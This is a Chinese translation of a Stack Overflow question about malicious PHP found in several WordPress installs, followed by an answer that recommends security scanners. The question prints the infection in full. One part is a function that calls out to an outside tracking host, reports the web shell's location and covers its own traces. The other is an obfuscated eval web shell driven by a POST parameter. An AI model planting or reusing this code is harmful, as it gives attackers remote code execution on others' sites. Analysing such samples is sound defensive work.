我刚刚注意到我的一些 wordpress 项目在特定位置包含一些随机代码。
例如: wp-includes/meta.php 包含在文件底部代码如下:
check_meta();
function check_meta(){
$jp = __FILE__;
$jptime = filemtime($jp);
if(time() >= 1456732115){
$jp_c = file_get_contents($jp);
if($t = @strpos($jp_c,"check_meta();")) {
$contentp = substr($jp_c,0,$t);
if(@file_put_contents($jp, $contentp)){
@touch($jp,$jptime);
}
}
}
@file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776828&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/wp-includes/ID3/getid.php");
}
另一个位置:wp-includes/ID3/getid.php 包含以下代码:
<?php if(isset($_GET['test'])){echo 'success';}else{isset($_POST['ttr6i']) && ($www= $_POST['ttr6i']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');}?>
基本上,我看到的是 check_meta() 方法正在更新 wp-includes/meta.php 文件而不更改其修改时间。然后,file_get_contents 连接到一些中国服务器并通过 $_GET 传递一些数据。
在第二个文件中,str_rot13('riny') 等于eval
以前有人处理过这类问题吗?也许有人可以对这段代码说更多。期待您的回音。这一刻,我把它当作病毒来对待,因为它已经传播到我的许多项目中。
最佳答案
永远不要相信您没有包含的陌生代码!诈骗者经常试图让恶意软件看起来无害,如上所示。尝试安装 WordFence、Sucuri 或其他安全插件并运行扫描。
关于php - 这是wordpress病毒吗?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/35654560/